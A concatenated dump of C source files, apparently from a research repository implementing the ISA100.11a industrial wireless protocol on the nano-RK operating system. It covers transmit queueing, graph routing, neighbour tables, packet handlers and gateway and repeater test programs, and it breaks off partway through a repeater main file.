/********dd_data_request : Service access point used to send data ******************
* SrcAddr (NL source address)
* DestAddr (NL destination address)
* Priority (priority of the payload)
* DE (discard eligible)
* ECN (explicit congestion notification)
* LH (last hop, NL)
* ContractID (ContractID of the payload)
* DSDULength (payload length)
* DSDU (number of octets as per DSDULength)
* DSDUHandle (uniquely identifies each invocation of this primitive)
*
*/
int8_t dd_data_request(uint16_t srcAddr, uint16_t destAddr, uint8_t priority, bool discardEligible, uint8_t ecn, bool lh, uint8_t contractId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
//Future - Table lookup based on contract Id and dest address
//Current - contractId is considered as the graphID directly and dest is the destID
//Configure the headers within the payload (whichever applicable)
payload[DEST_INDEX] = destAddr;
//if (contractId!=0)
{
DLMO_DROUT * dRout;
		dRout = (DLMO_DROUT *)&payload[DROUT_INDEX];
dRout->GraphId = contractId;
}
return enQueue (destAddr, priority, length, payload, slot_callback);
}
//Wrapper for dd_data_request
void sendPacket(uint16_t destAddr,uint8_t graphId, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
if (dd_data_request(0, destAddr, 0, 0, 0, 0, graphId, length, payload, slot_callback) == -1)
{
printIsaError();
}
}
//*******************dd_data_indication: Service access point used to indicate received data************
void dd_data_indication(uint16_t srcAddr,uint16_t destAddr,uint8_t priority,bool discardEligibile, bool lh, uint8_t length, uint8_t *payload)
{
// printf("packet is for me");
isa_rx_pkt_release();
}
/*
* Add to queue. Find a free place and insert with current time
*/
int8_t enQueue(uint16_t neighbor, uint8_t priority, uint8_t length, uint8_t *payload, void (*slot_callback)(ISA_QUEUE *entry, status))
{
uint8_t i;
/*
bool passedLowerPriority = false;
bool fixRequired = false;
bool insertionDone = false;
uint8_t lowerPriorityIndex;
uint8_t usedIndex;
ISA_QUEUE * temp;
*/
	if (isaTxQueueSize >= TRANSMIT_QUEUE_MAX_SIZE){  // queue already full
setIsaError(TRANSMIT_QUEUE_CAPACITY_ERROR);
return ISA_ERROR;
}
//check if length of payload is within bounds
if (length >= RF_MAX_PAYLOAD_SIZE) {
setIsaError(MAX_PAYLOAD_ERROR);
return ISA_ERROR;
}
//if we are here, we should have place to add into the Queue
//find the first free index and insert
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == false){
isaQueue[i].length = length;
isaQueue[i].priority = priority;
isaQueue[i].transmitPending = true;
isaQueue[i].usedSlot = true;
isaQueue[i].neighbor = neighbor;
isaQueue[i].slot_callback = slot_callback;
isaQueue[i].numTries = 0;
memcpy(isaQueue[i].tx_buf, payload, length );//copy the payload
nrk_time_get(&isaQueue[i].time); //copy the time when I was inserted into Queue
isaTxQueueSize++;
break;
}
}
if ( i == TRANSMIT_QUEUE_MAX_SIZE){
printf(" Critical error 2\r\n");
return ISA_ERROR;
}
return ISA_SUCCESS;
//this if evaluates the event in which I have not copied into a slot and find an entry of lower priority
/*
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && insertionDone == false && passedLowerPriority == false && isaQueuePointer[i]->priority < priority && isaQueuePointer[i]->neighbor == neighbor){
passedLowerPriority = true;
lowerPriorityIndex = i;
continue;
}
//if passedLowerPriority == true , then find a slot to insert and insert-> swap pointers for lowerPriority and free
//fix for every index till free index
if (insertionDone == false && isaQueuePointer[i]->usedSlot == false){
//find a free slot to insert
usedIndex = i;
isaQueuePointer[i]->length = length;
isaQueuePointer[i]->priority = priority;
isaQueuePointer[i]->transmitPending = true;
isaQueuePointer[i]->usedSlot = true;
isaQueuePointer[i]->neighbor = neighbor;
memcpy(isaQueuePointer[i]->tx_buf, payload, length );//copy the payload
isaTxQueueSize++;
insertionDone = true;
if (passedLowerPriority == true) break; //IF this is the case, I fix after this loop
continue;
}
if (insertionDone == true && isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority > isaQueuePointer[usedIndex]->priority ){ //Swap
//we come here only if fix required
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
//we can return now if we did not come here through the condition where I inserted after a higher priority
if (passedLowerPriority == false) return 1;
//I am here if I inserted after lower priority. Now I need to take care of fixing that
// I iterate from usedIndex to lowerPriority Index in the backward direction and fix
for (i = usedIndex -1 ; i >= lowerPriorityIndex ; i--)
if (isaQueuePointer[i]->usedSlot == true && isaQueuePointer[i]->transmitPending = false && isaQueuePointer[i]->neighbor == neighbor && isaQueuePointer[i]->priority < isaQueuePointer[usedIndex]->priority){
temp = isaQueuePointer[i];
isaQueuePointer[i] = isaQueuePointer[usedIndex];
isaQueuePointer[usedIndex] = temp;
usedIndex = i;
}
return 1;
*/
}
/*
* if numtries is 0 then we should have the preferred link, else take any of the other links if possible
*/
bool isLinkNeigborApplicable(ISA_QUEUE* isaQueue, DLMO_LINK * link)
{
uint8_t i;
if (isaQueue->numTries == 0){
if( link->graphPtr->neighbor[0] == link->neighbor->index ) return true;
return false;
}
//for the number of neighbors configured as alternate routes in this graph
for (i = 0; i< SHIFTRIGHT(ISAMASK(link->graphPtr->info, NEIGHBOR_COUNT_MASK),NEIGHBOR_COUNT_LOWER_BIT );i++){
if (link->graphPtr->neighbor[i] == link->neighbor->index) return true;
}
return false;
}
ISA_QUEUE * getHighPriorityEntry(DLMO_LINK * link){
uint16_t neighbor;
nrk_time_t time;
uint8_t priority = 0;
ISA_QUEUE* tempIndex;
bool found = false;
uint8_t i;
uint8_t graphType;
//check the link type
graphType = ISAMASK(link->typeInfo,GRAPH_TYPE_MASK);
graphType = SHIFTRIGHT(graphType,GRAPH_TYPE_BIT);
if (graphType == 0){ //if the graph type is 0
DIRECT_NEIGHBOR:
if (link->neighbor == NULL || link->neighbor->isPresent == false) return NULL;
neighbor = link->neighbor->index;
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true && isaQueue[i].neighbor == neighbor){
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
if (found == false) {
return NULL;
}
return tempIndex;
}
	else if (graphType == 1 || graphType == 2){ //this link is only for graph routing or this link prefers graph over direct neighbor
//get the graph from the link
if (link->graphPtr == NULL || link->graphPtr->index == 0) { //if the graph pointer is null and the graph type is 2, then check for neighbor, else return NULL
if (graphType==2)goto DIRECT_NEIGHBOR;
return NULL;
}
for (i = 0; i < TRANSMIT_QUEUE_MAX_SIZE; i++){
if (isaQueue[i].usedSlot == true && isaQueue[i].transmitPending == true ){
			DLMO_DROUT * dRout = (DLMO_DROUT *)&isaQueue[i].tx_buf[DROUT_INDEX];
if (dRout->GraphId!=0 && dRout->GraphId == link->graphPtr->index)//If the GraphId matches (graphId is 8 bits while index is 16 bits)
{//first time to be transmitted and top preference neighbor for is on this link or second time and second pref or third time and third pref
if (isLinkNeigborApplicable(&isaQueue[i], link))
{
if (found == false){
found = true;
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
// if the priority is greater or ( priority is the same and ( seconds is less or nanosecs is less))
if (found == true && ( priority < isaQueue[i].priority || ( (priority == isaQueue[i].priority) && ( time.secs > isaQueue[i].time.secs || (time.secs == isaQueue[i].time.secs && time.nano_secs > isaQueue[i].time.nano_secs ))))){
priority = isaQueue[i].priority;
tempIndex = &isaQueue[i];
time.nano_secs = isaQueue[i].time.nano_secs;
time.secs = isaQueue[i].time.secs;
}
}
}
}
}
if (found == false) {//if no graph to use, then we can check for direct neighbor, if type is 2
if (graphType == 2) goto DIRECT_NEIGHBOR; //we did not find a graph , so now we check for direct_neighbor
return NULL;
}
return tempIndex;
}
}
//*********************************************************************************************************
void isaFreePacket(ISA_QUEUE *entry){
//Write 0 into the queue payload
entry->usedSlot = false;
	entry->transmitPending = false;
entry->slot_callback = NULL;
isaTxQueueSize--;
}
//****************** Functions for dlmo.Candidate******************************
/*
* The protocol states that the system manager may ask the device to clear its
* entire candidate table. Individual candidates are never removed
*/
void clearCandidateTable(){
uint8_t i;
dlmoCandidate.n=0;
for (i=0; i< DLMO_CANDIDATE_MAX_SIZE ; i++){
dlmoCandidate.candidate[i].neighbor = 0; //setting to zero indicates that no neighbor is present
}
}
/*
* This function adds a neighbor in the candidate table
*/
int8_t addCandidate(uint16_t candidate){
uint8_t i;
for (i=0; i<dlmoCandidate.n; i++){
if (dlmoCandidate.candidate[i].neighbor == candidate){
// printf ("Neighbor: %d already present", candidate);
return ISA_SUCCESS;
}
}
if (dlmoCandidate.n >= DLMO_CANDIDATE_MAX_SIZE) {
setIsaError(CANDIDATE_CAPACITY_ERROR);
return ISA_ERROR ;//we have reached max size
}
dlmoCandidate.candidate[dlmoCandidate.n].neighbor = candidate;
dlmoCandidate.n++;
printf ("Added %d to Candidate table at %d\r\n", candidate,dlmoCandidate.n-1 );
return ISA_SUCCESS;
}
bool isDiscoveryAlertDue(){
nrk_time_t currentTime;
nrk_time_get(¤tTime);
	if (currentTime.secs - lastSentTime.secs > discoveryAlert.duration) return true;
else return false;
}
void updateLastSentTime(){
nrk_time_get(&lastSentTime);
}
int8_t sendAdv (){
uint8_t length;
	// 1 byte for the candidate count plus one CANDIDATE entry per neighbor
length = 1 + dlmoCandidate.n * sizeof(CANDIDATE);
MESSAGE *message;
message = &nbr_buf[PKT_DATA_START];
message->type = NEIGHBOR_TABLE_REPORT;
memcpy(&message->data, &dlmoCandidate, length);
nbr_buf[DEST_INDEX] = isa_clk_src_id;
nbr_buf[SRC_INDEX] = dmo.dlAddress;
//length of dlmo.candidate + PKT_DATA_START + message-> type (1)
length = length + PKT_DATA_START + 1;
return enQueue(isa_clk_src_id, 0, length, nbr_buf, NULL);
}
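/*
 * Resulting nbr_buf layout (sketch, assuming DLMO_CANDIDATE begins with
 * its count byte n): the common header up to PKT_DATA_START, then a
 * MESSAGE whose type is NEIGHBOR_TABLE_REPORT and whose data is the
 * populated prefix of dlmoCandidate:
 *
 *   [.. header ..][type][n][CANDIDATE 0] ... [CANDIDATE n-1]
 */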
/*
* This function is called to flush candidate table
*/
void flushCandidateEntries()
{
for (uint8_t i = 0; i < dlmoCandidate.n ; i++ ){
dlmoCandidate.candidate[i].neighbor = 0;
dlmoCandidate.candidate[i].rsqi = 0;
dlmoCandidate.candidate[i].rssi = 0;
}
dlmoCandidate.n=0;
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/route_pkt.c.svn-base
#include <globals.h>
#include <nrk.h>
#include <nrk_error.h>
#include <../include/sampl.h>
#include <route_pkt.h>
#include <ack_pkt.h>
#include <route_table.h>
int8_t route_generate(SAMPL_UPSTREAM_PKT_T *pkt,SAMPL_DOWNSTREAM_PKT_T *ds_pkt )
{
ACK_PKT_T p;
ROUTE_PKT_T r;
uint8_t num_pkts,i,selected;
selected=0;
num_pkts=ds_pkt->payload[0];
for(i=0; i<num_pkts; i++ )
{
route_pkt_get(&r, ds_pkt->payload, i);
if(r.mac_addr==my_mac)
{
selected=1;
route_table_set(r.dst_mac, r.next_hop_mac, r.value );
}
}
if(selected)
{
// build ACK reply packet
p.mac_addr=my_mac;
pkt->payload_len = ping_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
pkt->pkt_type=ACK_PKT;
} else
{
pkt->pkt_type = EMPTY_PKT;
pkt->num_msgs = 0;
}
return NRK_OK;
}
void route_pkt_get( ROUTE_PKT_T *p, uint8_t *buf, uint8_t index )
{
// 1 byte offset for number of messages
p->mac_addr=buf[1+index*ROUTE_PKT_SIZE];
p->dst_mac=buf[1+index*ROUTE_PKT_SIZE+1];
p->next_hop_mac=buf[1+index*ROUTE_PKT_SIZE+2];
p->value=buf[1+index*ROUTE_PKT_SIZE+3];
}
<file_sep>/ISA100.11a-master/ISA100_11a/11-2/current/nano-RK-well-sync/projects/SAMPL/pkt_handlers/.svn/text-base/trace.c.svn-base
#include <globals.h>
#include <nrk.h>
#include <nrk_error.h>
#include <../include/sampl.h>
#include <trace.h>
int8_t trace_generate(SAMPL_UPSTREAM_PKT_T *pkt, SAMPL_DOWNSTREAM_PKT_T *ds_pkt)
{
TRACE_PKT_T p;
p.mac_addr=my_mac;
//p.parent_mac=ds_pkt->last_hop_mac;
p.parent_mac=route_table_get(GATEWAY_MAC);
p.ds_rssi=ds_pkt->rssi;
p.us_rssi=255;
pkt->payload_len = trace_pkt_add( &p, pkt->payload,0);
pkt->num_msgs=1;
return NRK_OK;
}
int8_t trace_aggregate(SAMPL_UPSTREAM_PKT_T *in, SAMPL_UPSTREAM_PKT_T *out)
{
uint8_t len,i,j,k,dup;
TRACE_PKT_T p1, p2;
// if(in->next_hop_dst_mac!=my_mac ) nrk_kprintf( PSTR( "aggregating bad packet!\r\n" ));
for(i=0; i<in->num_msgs; i++ )
{
dup=0;
// get next ping packet to compare against current outgoing list
trace_pkt_get( &p1, in->payload, i );
for(k=0; k<out->num_msgs; k++ )
{
	     // get packet from outgoing list and compare against incoming packet
trace_pkt_get( &p2, out->payload, k );
if(p1.mac_addr==p2.mac_addr ) dup=1;
}
if(dup==0)
{
if(p1.parent_mac==my_mac)
p1.us_rssi=in->rssi;
// if packet is unique, add to outgoing packet
out->payload_len=trace_pkt_add( &p1, out->payload, out->num_msgs );
out->num_msgs++;
}
}
return NRK_OK;
}
void trace_pkt_get( TRACE_PKT_T *p, uint8_t *buf, uint8_t index )
{
p->mac_addr=buf[index*TRACE_PKT_SIZE];
p->parent_mac=buf[index*TRACE_PKT_SIZE+1];
p->ds_rssi=buf[index*TRACE_PKT_SIZE+2];
p->us_rssi=buf[index*TRACE_PKT_SIZE+3];
}
uint8_t trace_pkt_add( TRACE_PKT_T *p, uint8_t *buf, uint8_t index )
{
buf[index*TRACE_PKT_SIZE]= p->mac_addr;
buf[index*TRACE_PKT_SIZE+1]= p->parent_mac;
buf[index*TRACE_PKT_SIZE+2]= p->ds_rssi;
buf[index*TRACE_PKT_SIZE+3]= p->us_rssi;
return ((index+1)*TRACE_PKT_SIZE);
}
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/tools/SLIPstream/SLIPstream-client/converter.c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
char* bintochar(int c);
static char binarr[9];	/* 8 bit characters plus a terminating NUL */
int main (int argc, char *argv[])
{
FILE *rawFile;
int ch;
FILE *dataFile;
int cnt=0;
int i=0;
char *t;
	char fileName[64];
	char outputName[64];	/* large enough for the name plus the "out.txt" suffix */
	if (argc != 3) {
		printf ("Usage: %s <input file> <output prefix>\r\n", argv[0]);
exit (1);
}
strcpy(fileName,argv[1]);
strcpy(outputName,argv[2]);
strcat(outputName,"out.txt");
rawFile = fopen(fileName,"r");
dataFile = fopen(outputName,"w");
while((ch=fgetc(rawFile))!=EOF){
//convert and save to a new file
//printf("ch :%d\r\n",ch);
t=bintochar(ch);
//for(i=0;i<8;i++){
//printf("%d",t[i]);
fprintf(dataFile,"%s\n",t);
//printf("\r\n");
//fprintf(dataFile,"%c",ch);
}
fclose(rawFile);
fclose(dataFile);
	return 0;
}
char* bintochar(int c)
{
int i;
for(i=7;i>=0;i--)
{
binarr[i]=c%2+'0';
//printf("%d",binarr[i]);
c=c/2;
}
	binarr[8]='\0';	/* terminate so callers can print the buffer with %s */
	return binarr;
}
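/*
 * Usage sketch: "./converter capture.raw run1" reads capture.raw and
 * writes one 8-character binary string per input byte to "run1out.txt"
 * (the output name is argv[2] with "out.txt" appended).
 */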
<file_sep>/ISA100.11a-master/ISA100_11a/code/backup/isa_noresync_without_write_file/gateway/.svn/text-base/main.c.svn-base
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
#include <slip.h>
//#include <sys/time.h>
#define MY_CHANNEL 19
#define MY_ID 0 //change
#define MY_TX_SLOT 0
#define NUM_OF_TEST_SET 16
#define MAX_SLIP_BUF 17
#define NUM_OF_NODES 3
//#define JOIN_TX_SLOT_START 22
//#define MY_RX_SLOT 15
//#define MY_RX_SLOT 2// change for test
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
NRK_STK Stack2[NRK_APP_STACKSIZE];
nrk_task_type TaskTwo;
void Task2 (void);
void nrk_create_taskset();
void packet_measurement_better(uint8_t * local_rx_buf);
/*Buffers*/
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
uint8_t slip_tx_buf[MAX_SLIP_BUF];
uint8_t slip_rx_buf[MAX_SLIP_BUF];
/*packet evaluation related*/
uint8_t pkt_measure[NUM_OF_NODES][NUM_OF_TEST_SET];
uint8_t sendFlag;
uint8_t frame_cnt[NUM_OF_NODES]; //add 1 every 8 packets
uint8_t pkt_cnt[NUM_OF_NODES];
uint8_t current_pkt_index[NUM_OF_NODES];
uint8_t received_pkt_index[NUM_OF_NODES];
uint8_t current_node;
uint8_t send_node;
/* signal related declaration */
int8_t pkt_record_done_signal;
int8_t pkt_record_check()
{
return sendFlag;
}
int8_t wait_until_record_full()
{
nrk_signal_register(pkt_record_done_signal);
if (pkt_record_check() != 0)
return NRK_OK;
nrk_event_wait (SIG(pkt_record_done_signal));
return NRK_OK;
}
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
nrk_create_taskset ();
nrk_start();
return 0;
}
void Task1()
{
uint8_t j, i;
uint8_t length,slot,len;
uint8_t *local_rx_buf;
//uint32_t Score = 0;
int8_t rssi;
uint8_t cnt=0;
//char c = -1;
nrk_sig_t uart_rx_signal;
uint8_t finished = 0;
printf( "Task1 PID=%d\r\n",nrk_get_pid());
nrk_led_set(RED_LED);
nrk_led_set(BLUE_LED);
isa_set_channel_pattern(1); // must before isa_init
//isa_set_channel_pattern(3);
isa_init (ISA_GATEWAY, MY_ID, MY_ID);//change
isa_set_schedule(ISA_GATEWAY, MY_ID);
isa_set_channel(MY_CHANNEL);
//configAdvDAUX(1, 0, 25, 1, NULL, NULL, NULL, 2, NULL, NULL, NULL);
isa_start();
isa_rx_pkt_set_buffer(rx_buf, RF_MAX_PAYLOAD_SIZE);
//slip_init (stdin, stdout, 0, 0);
//while (slip_started () != 1) nrk_wait_until_next_period ();
config_child_list(1);
config_child_list(2);
while(!isa_ready()) nrk_wait_until_next_period();
printf("isa start!\n\r");
pkt_record_done_signal=nrk_signal_create();
if(pkt_record_done_signal==NRK_ERROR){
nrk_kprintf(PSTR("ERROR: creating packet record signal failed\r\n"));
nrk_kernel_error_add(NRK_SIGNAL_CREATE_ERROR,nrk_cur_task_TCB->task_ID);
	  return;  /* Task1 returns void */
}
while(1){
nrk_gpio_set(NRK_DEBUG_3);
if( isa_rx_pkt_check()!=0 ) {
//printf("message is received.\n\r");
local_rx_buf=isa_rx_pkt_get(&length, &rssi);
//printf("RXLEN:%d\r\n",length);
//for(i=PKT_DATA_START; i<length-1; i++ )
//printf( "node %c,%d\r\n",local_rx_buf[PKT_DATA_START+5],local_rx_buf[PKT_DATA_START+7]);
//packet_measurement(local_rx_buf,length);
packet_measurement_better(local_rx_buf);
//printf( "%c",local_rx_buf[PKT_DATA_START]);
isa_rx_pkt_release();
//printf("\r\n");
}
if(isa_tx_pkt_check(MY_TX_SLOT)!=0){
//printf("Pending TX\r\n");
}
else{
sprintf( &tx_buf[PKT_DATA_START],"node %d,%c",MY_ID,cnt++);
length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+1;
isa_tx_pkt(tx_buf,length,configDHDR(),MY_TX_SLOT);
//printf("Len:%d\r\n",length);
//printf("Hello world is sent.\n\r");
}
nrk_gpio_clr(NRK_DEBUG_3);
isa_wait_until_rx_or_tx ();
}
}
void Task2 ()
{
uint8_t len,i;
uint8_t zero_killer=0xaa;
slip_init (stdin, stdout, 0, 0);
wait_until_record_full(); //wait for first batch of packets
while (1) {
//nrk_led_set (ORANGE_LED);
//sprintf (slip_tx_buf, pkt_measure);
//if(sendFlag){
//printf("")
nrk_gpio_set(NRK_DEBUG_1);
//printf("CN:%d\r\n",send_node);
slip_tx_buf[0]=send_node+1; // get rid of '\0'
for(uint8_t i=0;i<NUM_OF_TEST_SET;i++){
slip_tx_buf[i+1]=pkt_measure[send_node][i] ^ zero_killer; //get rid of '\0'
}
//slip_tx_buf[i]=0; // add '\0' at the end
len = strlen (slip_tx_buf);
//printf("%d\r\n",len);
slip_tx (slip_tx_buf, len);
sendFlag=0;
for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[send_node][i]=0;
}
printf("KO,%d\r\n",send_node);
//nrk_wait_until_next_period ();
nrk_gpio_clr(NRK_DEBUG_1);
//}
wait_until_record_full();
}
}
void
nrk_create_taskset()
{
TaskOne.task = Task1;
TaskOne.Ptos = (void *) &Stack1[NRK_APP_STACKSIZE-1];
TaskOne.Pbos = (void *) &Stack1[0];
TaskOne.prio = 2;
TaskOne.FirstActivation = TRUE;
TaskOne.Type = BASIC_TASK;
TaskOne.SchType = PREEMPTIVE;
TaskOne.period.secs = 0;
TaskOne.period.nano_secs = 500*NANOS_PER_MS;
TaskOne.cpu_reserve.secs = 0;
TaskOne.cpu_reserve.nano_secs = 500*NANOS_PER_MS;
TaskOne.offset.secs = 0;
TaskOne.offset.nano_secs= 60*NANOS_PER_MS;
nrk_activate_task (&TaskOne);
TaskTwo.task = Task2;
nrk_task_set_stk( &TaskTwo, Stack2, NRK_APP_STACKSIZE);
TaskTwo.prio = 3;
TaskTwo.FirstActivation = TRUE;
TaskTwo.Type = BASIC_TASK;
TaskTwo.SchType = PREEMPTIVE;
TaskTwo.period.secs = 20;
TaskTwo.period.nano_secs = 0;
TaskTwo.cpu_reserve.secs = 0;
TaskTwo.cpu_reserve.nano_secs = 0;
TaskTwo.offset.secs = 0;
TaskTwo.offset.nano_secs = 100*NANOS_PER_MS;
nrk_activate_task (&TaskTwo);
nrk_kprintf( PSTR("Create Done\r\n") );
}
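/*
 * Bit-recording sketch: each byte of pkt_measure[node][] covers eight
 * consecutive packet indices, one bit per packet received.  For example,
 * if packets 0, 1 and 3 of a frame arrive, the frame's byte ends up as
 * 0x0B (bits 0, 1 and 3 set); a sequence jump of k advances pkt_cnt by k
 * and leaves the skipped bits cleared, marking those packets as lost.
 */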
void packet_measurement_better(uint8_t * local_rx_buf)
{
uint8_t i,length;
uint8_t next_pkt_offset;
uint8_t temp;
if(local_rx_buf[PKT_DATA_START]=='n'){
current_node = local_rx_buf[PKT_DATA_START+5]-'0'; // node number
received_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7];
next_pkt_offset = received_pkt_index[current_node]-current_pkt_index[current_node]; // packet index difference
//printf("%d,%d\r\n",next_pkt_offset,current_node);
//if(next_pkt_offset!=1){
//printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
if(next_pkt_offset>=20){
printf("HUGE LOSS\r\n");
printf("%d,%d,%d,%d,%d\r\n", local_rx_buf[PKT_DATA_START+7],current_pkt_index[current_node],next_pkt_offset,current_node,isa_get_channel());
}
//}
		current_pkt_index[current_node] = local_rx_buf[PKT_DATA_START+7]; // update current packet index
pkt_cnt[current_node] += next_pkt_offset; // add the number of packet been measured
temp = current_pkt_index[current_node] % 8; // use 1 byte to record 8 packets
//printf("%d,%d,%d\r\n",temp,frame_cnt[0],pkt_cnt[0]);
if(pkt_cnt[current_node]>=8){
frame_cnt[current_node]+=pkt_cnt[current_node]/8;
pkt_cnt[current_node]=temp;
//printf("current frame cnt: %d\r\n", frame_cnt[current_node]);
}
if(frame_cnt[current_node]>=NUM_OF_TEST_SET){
/*for(i=0;i<NUM_OF_TEST_SET;i++){
printf("pkt: %x\r\n",pkt_measure[current_node][i]);
}*/
//printf("KO %d\r\n",current_node);
// reboot buffer for further test
frame_cnt[current_node]=0;
sendFlag=1;
send_node=current_node;
nrk_event_signal (pkt_record_done_signal);
nrk_spin_wait_us(3000);
/*for(i=0;i<NUM_OF_TEST_SET;i++){
pkt_measure[current_node][i]=0;
}*/
}
//printf("%d,%d,%d\r\n",temp,frame_cnt[1],pkt_cnt[1]);
pkt_measure[current_node][frame_cnt[current_node]] |= ((uint8_t) 1) << temp;
}
}
<file_sep>/ISA100.11a-master/ISA100_11a/backup_azi/nano-RK-well-sync/src/net/isa/isa_error.c
#include <isa_error.h>
// This uint8_t will store the latest error
static uint8_t isaError;
//********************Local function definitions***********************************
void setIsaError(uint8_t);
uint8_t getIsaError ();
void printIsaError();
//***********************************************************************************
void setIsaError(uint8_t value)
{
isaError = value;
}
uint8_t getIsaError ()
{
return isaError;
}
void printIsaError()
{
switch(isaError)
{
case LINK_CAPACITY_ERROR :
printf ("ISA_ERROR : LINK_CAPACITY_ERROR \n\r" );
break;
case NEIGHBOR_CAPACITY_ERROR :
printf ("ISA_ERROR : NEIGHBOR_CAPACITY_ERROR\n\r" );
break;
case TRANSMIT_QUEUE_CAPACITY_ERROR :
printf ("ISA_ERROR : TRANSMIT_QUEUE_CAPACITY_ERROR\n\r" );
break;
case MAX_PAYLOAD_ERROR :
printf ("ISA_ERROR : MAX_PAYLOAD_ERROR\n\r");
break;
		case CANDIDATE_CAPACITY_ERROR :
			printf ("ISA_ERROR : CANDIDATE_CAPACITY_ERROR\n\r");
			break;
		case GRAPH_CAPACITY_ERROR :
			printf ("ISA_ERROR : GRAPH_CAPACITY_ERROR\n\r");
			break;
		default: printf ("Unknown ISA_ERROR\n\r");
}
}
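/*
 * Usage sketch of the error convention (as used throughout the ISA code):
 *
 *   if (addCandidate (id) == ISA_ERROR) {
 *       printIsaError ();   // e.g. reports CANDIDATE_CAPACITY_ERROR
 *   }
 */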
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/src/net/isa/isa_error.h
#ifndef _ISA_ERROR_H
#define _ISA_ERROR_H
#include <include.h>
#include <stdio.h>
#define ISA_ERROR -1
#define ISA_SUCCESS 1
#define LINK_CAPACITY_ERROR 1
#define NEIGHBOR_CAPACITY_ERROR 2
#define TRANSMIT_QUEUE_CAPACITY_ERROR 3
#define MAX_PAYLOAD_ERROR 4
#define CANDIDATE_CAPACITY_ERROR 5
#define GRAPH_CAPACITY_ERROR 6
//********************************Extern functions*******************************************
extern void setIsaError(uint8_t);
extern uint8_t getIsaError ();
extern void printIsaError();
//*******************************************************************************************
#endif
<file_sep>/ISA100.11a-master/ISA100_11a/code/current/nano-RK-well-sync/projects/final_project/repeater/main.c
#include <nrk.h>
#include <include.h>
#include <ulib.h>
#include <stdio.h>
#include <avr/sleep.h>
#include <hal.h>
#include <isa.h>
#include <nrk_error.h>
//#include <sys/time.h>
#include <spi_matrix.h>
#define MY_CHANNEL 19
#define MY_ID 2 //change
//#define MY_TX_SLOT_SYNC 2
//#define s 17
//#define MY_RX_SLOT 2
//#define MY_TX_SLOT 7
//#define MY_TX_SLOT1 8
#define MY_CLK_SRC_ID 1
NRK_STK Stack1[NRK_APP_STACKSIZE];
nrk_task_type TaskOne;
void Task1(void);
void nrk_create_taskset();
uint8_t tx_buf[RF_MAX_PAYLOAD_SIZE];
//uint8_t tx_buf2[RF_MAX_PAYLOAD_SIZE];
uint8_t rx_buf[RF_MAX_PAYLOAD_SIZE];
nrk_time_t timestart;
nrk_time_t timeend;
nrk_time_t newtime;
nrk_time_t timeout;
//*********************Making a callback function***************************************
void transmitCallback1(ISA_QUEUE *entry , bool status){
	uint8_t length;
	MESSAGE *message;
	DLMO_DROUT *dRout;
	message = (MESSAGE *)&tx_buf[PKT_DATA_START];
	message->type = DUMMY_PAYLOAD;
	sprintf( &message->data,"node" );
	length=strlen(&tx_buf[PKT_DATA_START])+PKT_DATA_START+2;
	dRout = (DLMO_DROUT *)&entry->tx_buf[DROUT_INDEX];	// reuse the graph id carried by the packet just completed
	sendPacket(entry->tx_buf[DEST_INDEX],dRout->GraphId, length, tx_buf, transmitCallback1);
	isaFreePacket(entry);
}
//*******************************************************************************
int main ()
{
nrk_setup_ports();
nrk_setup_uart(UART_BAUDRATE_115K2);
nrk_kprintf( PSTR("Starting up...\r\n") );
nrk_init();
nrk_led_clr(0);
nrk_led_clr(1);
nrk_led_clr(2);
nrk_led_clr(3);
nrk_time_set(0,0);
isa_task_config();
isa_set_channel_pattern(1);
isa_init (ISA_REPEATER, MY_ID, MY_CLK_SRC_ID);//change
dlmoInit(); //Initialize the Data Link Management Object
addNeighbor(1,0,0,0,true,0,0,0);
addNeighbor(5,0,0,0,false,0,0,0);
addNeighbor(6,0,0,0,false,0,0,0);
addNeighbor(7,0,0,0,false,0,0,0);
addNeighbor(8,0,0,0,false,0,0,0);
